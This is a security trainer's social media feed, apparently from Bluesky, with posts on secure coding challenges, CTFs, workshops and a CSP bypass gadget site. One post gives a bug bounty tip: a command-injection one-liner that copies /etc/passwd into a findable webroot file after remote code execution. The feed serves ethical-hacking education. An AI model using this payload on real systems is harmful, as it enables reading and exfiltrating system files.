Haha, love the fact we got to see your whole thought process haha, nice work :)
04.02.2025 07:18
@buildhacksecure.bsky.social
Fullstack dev & Hacker, training ethical hackers how to hack & web devs to secure their apps! CTO at https://hackinghub.io and Director at https://bsidesexeter.co.uk
Secure Coding Challenge…
What is insecure about this code? And how would you extract a file? For example /etc/passwd
If it doesn't work, it's always DNS you know. I created a challenge around this nightmare that will be kindly hosted by @hackinghub.bsky.social starting today at 18:00 UTC. Thanks @buildhacksecure.bsky.social for the kind hospitality.
15.01.2025 17:56
So say we have the webroot:
/var/www/you-cant-guess/
And a file located here: /var/www/you-cant-guess/assets/uniquefile.png
The above command becomes:
cat /etc/passwd > /var/www/you-cant-guess/assets/uniquefile.png.txt
Got an RCE in a background process with no outbound network so you need to exfil to webroot without knowing the location?
All you need to know is a unique filename in the webroot.
$( cat /etc/passwd > $(find / -name uniquefile.png 2>/dev/null).txt )
#bugbountytips #hacking
Merry Christmas!
25.12.2024 07:36
I don't know how I feel about AI. As a dev for 20+ yrs, I love coding, creating, solving puzzles. AI saves time & makes sense for business, but is it sucking the joy out of it? Are we all just becoming prompt engineers? Maybe I'm just an old man shouting at clouds...
20.12.2024 12:16
Thank you mate, I try :)
10.12.2024 21:18
Adam has the rare ability to turn seemingly simple situations into opportunities for reflection or learning.
10.12.2024 19:37
I once did one side of a cube, that's the furthest I've got haha
10.12.2024 07:40
Okay, I have a toxic CTF challenge idea.... Should I do it? Operation "Merry ToxMas"
09.12.2024 10:21
2 Hours in and weirdly not tired. Just covered our SQL Injection module.
04.12.2024 00:01
Hosting a workshop with @nahamsec.bsky.social remotely in Aus from 10pm to 1:30am for YowConf! Come on coffee!!!
04.12.2024 00:00
23.11.2024 21:53
Oh yeah, totally all downhill from here.
22.11.2024 16:44
Ah Happy Birthday dude, welcome to the 40 club!
22.11.2024 16:10
Yeah I totally agree, it feels so much calmer here.
20.11.2024 19:14
Ah nice, you too buddy :)
17.11.2024 22:33
Hey BlueSky!
In case you missed it:
I've created cspbypass.com
A site where you can search for known CSP bypass gadgets to gain XSS.
It already contains a bunch of useful gadgets with contributions from your favourite hackers.
If you have some CSP bypasses to share, feel free to contribute!
I'm delivering a talk about web app security (or the lack of it) in web apps and also delivering a workshop in Melbourne, Brisbane and Sydney at the start of December! See yowcon.com for more detail.
15.11.2024 16:33
Can't work out whether you're giving a talk or belting out a song :)
14.11.2024 09:09
Hoping I prefer this platform a little more :) Give us a follow if you're into web app security or web development #webdev #hacking #ethicalhacker #php
14.11.2024 09:07